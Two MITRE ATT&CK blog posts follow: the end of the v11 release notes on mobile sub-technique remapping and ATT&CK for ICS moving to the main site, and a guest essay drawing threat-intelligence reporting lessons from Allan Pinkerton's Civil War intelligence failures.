For techniques labeled as “Deprecated”, we removed them from ATT&CK without replacing them. They were deprecated because we felt they did not fit into ATT&CK or due to a lack of observed in the wild use. For example, Remotely Wipe Data Without Authorization (T1469) was removed because we hadn’t been able to find evidence of any adversary using it in the wild.

Step 3: Review the techniques that have new sub-techniques to see if the new granularity changes how you’d map

If you want to take full advantage of sub-techniques, there’s one more step. Many “Remains Technique” techniques now have new sub-techniques you can take advantage of.

One great example of an existing technique that now has new sub-techniques is Application Discovery (T1418). Its name was updated to Software Discovery, and its content was broken out into a new sub-technique: Security Software Discovery (T1418.001).

The new sub-techniques add more detail and taking advantage of them will require some manual analysis. The good news is that the additional granularity will allow you to represent different types of software discovery that can happen at a more detailed level. These types of remaps can be done over time, because if you keep something mapped to Software Discovery, then it’s still correct. You can map new stuff to the sub-techniques and come back to the old ones to make them more precise as you have time and resources.

TL;DR, if you do just Step 1 while mapping things that are deprecated to NULL, then it will still be correct. If you do Step 2, then you’ll have pretty much everything you mapped before now also mapped to the new Mobile ATT&CK. If you complete Step 3, then you’ll get the newfound power of sub-techniques!

ATT&CK for ICS Joins attack.mitre.org

ATT&CK for ICS launched at the beginning of 2020 on a MediaWiki site similar to how attack.mitre.org used to appear. Being on a separate site has let it develop and mature independently while we’ve added it to one ATT&CK resource at a time. Today we’ve added ATT&CK for ICS to our most visible resource, the ATT&CK website (attack.mitre.org).

What’s changed? First off, ATT&CK for ICS will no longer have that nostalgic ATT&CK Wiki look and feel, and links to ATT&CK for ICS will need to be updated. Second, we’ve merged the Groups and Software from ICS, adding ICS techniques to Group and Software pages that existed on both sites, and updating descriptions to include both.

Finally, we’ve merged Data Sources and Data Components in from ATT&CK for ICS. Since there’s quite a bit of overlap between ICS and Enterprise Data Sources we’ve added a filter that allows you to see just Enterprise, just ICS, and all Data Sources and Components on both the overall Data Sources list and individual Data Source pages.

What hasn’t changed? ATT&CK for ICS’s content hasn’t changed and its STIX representation remains in the same place. We will also be keeping the previous website in place until October 2022 to avoid breaking your deep links. We will have increasingly dire warnings on each page reminding people to update their links before it is eventually deprecated. In the future, content will only be updated on attack.mitre.org and not the MediaWiki site.

What’s Left in 2022?

We’ve just released our 2022 roadmap and continue to work across the framework. In v12 we plan on adding a new object related to groups in ATT&CK, Campaigns. Check out the slides from Matt Malone’s talk from ATT&CKcon 3.0, our recent roadmap blog post, or stay tuned for more details coming soon about their implementation.

We continue our work on improving the macOS platform and plan to focus on improvements to Linux between now and October. Please reach out to us via [email protected] or via our Slack if you’d like to contribute knowledge of what adversaries have been up to on either platform.

As always, if you have feedback, comments, contributions, or just want to ask questions, connect with us on email, Twitter, or Slack.

©2022 The MITRE Corporation. ALL RIGHTS RESERVED. Approved for public release. Distribution unlimited 22–00744–2.

---

ATT&CK Goes to v11 was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.

Guest Post by ATT&CKcon 3.0 Keynote Speaker, Selena Larson

At the onset of the Civil War, a man whose name would eventually become synonymous with famous American detectives was reportedly providing false reports to the Union’s top general. Allan Pinkerton, who once successfully smuggled Abraham Lincoln into Washington, D.C. to avoid a rumored assassination attempt before he was even sworn in as president, acted as General George McClellan’s top intelligence officer. He was considered one of the best spymasters in the United States, responsible for effectively founding the nation’s first secret service.

In this piece, we’ll dive into some major intelligence reporting failures that dogged the renowned spymaster, how effective and concise intelligence reporting can change the course of history, and how the MITRE ATT&CK framework can help streamline and effectively communicate actionable threat intelligence.

Pinkerton was a detective when he first got to know Lincoln, but quickly became an indispensable intelligencer for the Union, first in the nation’s capital and then on the battlefield, working as a Civil War spymaster in 1861–1862. He operated a large team of spies who conducted counterespionage operations throughout Washington and information gathering expeditions into enemy territory. Pinkerton’s successes and failures are many — he made many of his own tactical intelligence failures that cost at least one spy his life during the Civil War — but there is a lot modern day intelligence analysts can learn from him. Specifically, from his intelligence reports.

According to author Douglas Waller, author of Lincoln’s Spies, Pinkerton was not very good at validating or communicating information, or transforming it from data into intelligence. Throughout his time operating a secret service on behalf of the Union, he collected a lot of information. But that information was frequently poorly vetted, based on single sources, or received from biased narrators. And often, the information was ineffectively communicated, or outright falsified.

By dissecting the failures of the nation’s first intelligence service spymaster, modern day threat intelligence analysts can learn how and why effective intelligence communication and report writing can have major effects on an organization — and, in some cases, have the potential to change the course of history.

HiPPO Bias

One of the biggest failures plaguing Pinkerton’s reporting apparatus was his desire to please his boss. General McClellan was famously slow to take any offensive actions against the enemy, holding a deep fear of failure that paralyzed him into inaction.

McClellan reportedly believed the Confederate military to be much larger than it actually was, in part due to the “intelligence” provided to him by his top spy. In fact, the relationship between Pinkerton and McClellan was more like a self-licking ice cream cone. While stationed with McClellan in Washington, Virginia, and Maryland, Pinkerton worked his network of operators to collect information on enemy troop movement and the size of the Confederate army. Sometimes information proved to be correct; other times it was outright false. But in most cases, Pinkerton cherry-picked data that supported his boss’s beliefs of an opposing force either equal to or out-sizing the Union military, ignoring accurate information on the small size of the Confederate forces and further inflating already inflated estimates to appeal to McClellan’s beliefs.

“Loyal to the point of sycophancy, Pinkerton never doubted the general’s ability as a commander. Instead of serving his country or his president as a true intelligence officer, he made his friend happy.” Lincoln’s Spies

Pinkerton was demonstrating Highest Paid Person’s Opinion (HiPPO) bias, or the idea that analysts collect and disseminate information in a way that favors or appeals to existing beliefs within an organization, typically driven by leadership.

“Pinkerton admitted that he and McClellan had conspired to cook the books. In a later November 15 letter to the general, Pinkerton explained that his estimate of Confederate strength ‘was made large, as intimated to you at the time, so as to be sure to cover the entire number of the Enemy that our army was to meet.’ The controversial sentence appeared to show that before Pinkerton issued his October 4 report [reporting double the total number of actual Confederate troops], he and McClellan agreed to deliberately inflate the confederate numbers to be sure they included troops Pinkerton’s agents might not know about. ”

This can be a frequent issue for analysts tasked with certain objectives and directives, but it can also be detrimental to the organization’s decision making and ultimate success. For example, if leadership believes that Russian state-sponsored threats are the most important and likely the most targeted to their organization, defenders and analysts will be spending more key resources hunting for and defending against these threats, with the potential to miss or disregard tactics, techniques, and procedures (TTPs) associated with other relevant, but different, activity.

Use data to build your case. In her 2019 ATT&CKcon 2.0 keynote, Google’s Toni Gidwandi explained how the MITRE ATT&CK matrix can be a “powerful corrective” to HiPPO bias and enable security teams to understand what is happening in the landscape and how it translates to impacts on their organizations.

Beyond indicators of compromise (IOCs), ATT&CK allows defenders to visualize threat behaviors in a digestible way to show what TTPs are observed and impacting an organization versus what stakeholders expect or want to focus on.

Analysts can create mappings of MITRE ATT&CK to malware, malware families and techniques observed in their environment. Subsequently, analysts can craft search queries to help with threat hunting and detection efforts. For example, mapping and searching on specific execution techniques such as certutil or BITSAdmin which are being used to download follow-on payloads.

By identifying the most impactful behaviors, and possible gaps in defense, security teams can prioritize hunting, detection, and response based on observable threat behaviors rather than requests or knee-jerk reactions from stakeholders.

Ultimately, Pinkerton’s analysis failed his organization — his reporting coupled with McClellan’s ego and general aversion to taking decisive action may have cost the Union military successes early on in the Civil War.

Reporting Is Not Letter Writing

In addition to some reports containing easily disproved inaccuracies, Pinkerton and many of his staff typically wrote very long reports, with much of the key details hidden among flowery language, tens of pages deep. Effectively communicating actionable intelligence is a common issue with cyber threat intelligence dissemination, and it’s nice to know our predecessors experienced similar flaws.

“He always wrote [intelligence reports] in the form of a letter, and they began with a flowery opening officers of the day commonly used, such as ‘I have the honor to report…’” Lincoln’s Spies

Pinkerton also reportedly doodled in the margins, drawing cartoon fingers to indicate what the most important parts of the reports were.

Succinctly and effectively communicating intelligence through written reports is difficult, but there are some key characteristics of good intelligence reporting that can help improve efficiency, streamline the writing process, and provide stakeholders with relevant data.

Put the most important information first. Frequently referred to as the stating Bottom Line Up Front (BLUF), immediately detailing the findings of your reporting and why they matter to an organization is crucial. This can be considered the “So What?” portion of the report. Most people — especially key stakeholders like executive audiences — will not read every word of an in-depth intelligence report. It is therefore important to ensure that in the short amount of time allotted for consuming reporting, they can read and understand the points that matter most.

Be concise. Pinkerton didn’t need flowery language and neither do you. I have said this before, but I firmly believe people should not require a thesaurus to read and understand threat intelligence reporting. The report should contain relevant information such as: What happened, why does it matter, and what can we do about it? Items such as anecdotes, extraneous clauses, and navel-gazing are generally unnecessary.

Consider your audience. Executives likely don’t need details of deconstructed malware. Security operations analysts likely don’t need geopolitical analysis of events occurring in places where the business does not operate. Threat intelligence analysts should always be aware of who is reading reports and why. Make sure you know the answer to: What decisions are being made based on this data? Gathering intelligence requirements and understanding how your audience is using intelligence throughout the organization can help shape and improve your reporting.

MITRE ATT&CK has become the universal framework for threat actor TTPs, and can be used to quickly distill and communicate threat intelligence. But where and how it’s used varies based on the audience receiving the information.

For example, in February 2022, intelligence agencies from the United States and United Kingdom published a joint advisory on a new malware called Cyclops Blink targeting small office/home office routers attributed to the Russian state actor Sandworm. The 10-page advisory was designed as an overview of the malware and related threats, documenting Sandworm’s historic and current activity and its relevance in the overall threat landscape. In this report, the MITRE ATT&CK mappings were presented at the end, to add additional insight and technical details to an otherwise fairly high-level, strategic report. However, in a companion malware analysis report published by the UK’s National Cyber Security Centre, the ATT&CK mappings were presented on page three of 20, demonstrating the framework can be used to summarize tactical threat intelligence.

Like any tool, where and how you use MITRE ATT&CK to document TTPs is crucial for an audience’s understanding of the threats.

Always Evaluate OSINT

While Pinkerton collected massive amounts of information and distributed it whole cloth to his superiors, there was little explanation given to where the information came from or its validity.

“Rarely did Pinkerton include in his reports an evaluation of a source’s reliability beyond a general impression he had of it.” Lincoln’s Spies

Pinkerton was operating based on human intelligence, information collected by his operatives in the field. Much of it was gossip; some of it reached his ears by a convoluted game of telephone. A lot of it was reliable and accurate — some of it was not.

As intelligence analysts, understanding and evaluating the veracity of information is crucial to communicating and acting on it. Primary sources of intelligence — the data we collect on our networks — we typically understand to be reliable. But we also rely on open source intelligence (OSINT) to form a whole picture of adversary threat behaviors and an understanding of the threat landscape.

Unfortunately, there is a lot of bad information on the internet. The online claims of unconfirmed hacking campaigns during the ongoing war in Ukraine is an excellent example of information spreading far and wide without validation, and likely making it into intelligence briefings on the conflict.

There are multiple questions analysts should ask themselves when reviewing third-party data to support original research, for example:

• What is the visibility of the individual or organization?
• What evidence are their claims based on?
• Is this evidence available to me?
• Does this overlap with known threat activity?
• Cui bono? Or, who benefits and how?

There is always inherent bias in visibility; vendors or anti-virus companies will only have data from the organizations and geographies in which it is used. If the visibility is limited, it might not be an effective source for verifying or supporting existing hypotheses. Being able to independently validate or invalidate evidence provided in open-source artifacts with internal tools and resources can help further your own investigations or reporting. And finally, considering political, financial, economic, etc. motivations in external reporting can help identify potential biases in reporting and inform your assessments of a source’s reliability.

The MITRE ATT&CK framework exists in part to help answer these questions, especially for providing validated, authoritative third-party intelligence reporting.

A Dictionary of Threats

While the United States was fighting the bloodiest war in the nation’s history, an idea was blossoming among philologists in the United Kingdom. English speakers had colonized many parts of the world, with English customs and culture forcing itself into existing cultures and communities, with paltry existing resources standardizing vocabulary. Academics in the UK argued that there should be a single authoritative resource to define the English language, documenting and establishing the correct form of communications.

Formally proposed in 1857, what would become known as the Oxford English Dictionary would eventually achieve its goal of standardizing English words beginning in 1884. It was a massive undertaking that brought together academics, historians, and the English-speaking public to collect and define words. In fact, the dictionary could not have been written without considerable public assistance.

The MITRE ATT&CK framework has become the universal dictionary of TTPs, in large part due to contributions from analysts and researchers around the globe. According to MITRE, 155 people contributed to the framework in 2021. (In fact, this year my Proofpoint colleague Michael Raggi contributed an update to ATT&CK Technique T1221 to include a novel RTF template injection technique observed in use by multiple threat actors.)

The authoritative nature of the framework has allowed analysts to verify open-source reporting, and better understand the nature of threat actors. It has also allowed researchers to more effectively document and communicate threat behaviors, prioritize detections, and improve defense. By standardizing how we identify and classify threat behaviors, actionable intelligence can be more easily communicated to a variety of stakeholders.

Pinkerton did not have a reliable threat intelligence framework or dictionary off which to operate; indeed he was trailblazing the creation of a secret service that had never before existed. And while his early work helped pave the way for modern day spying and the development of the Secret Service, he and his team were far from perfect. But by examining the intelligence reporting failures documented by modern historians, threat intelligence analysts can be better prepared when they too one day may be called on to help change the course of history.

---

Intelligence Failures of Lincoln’s Top Spies: What CTI Analysts Can Learn From the Civil War was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.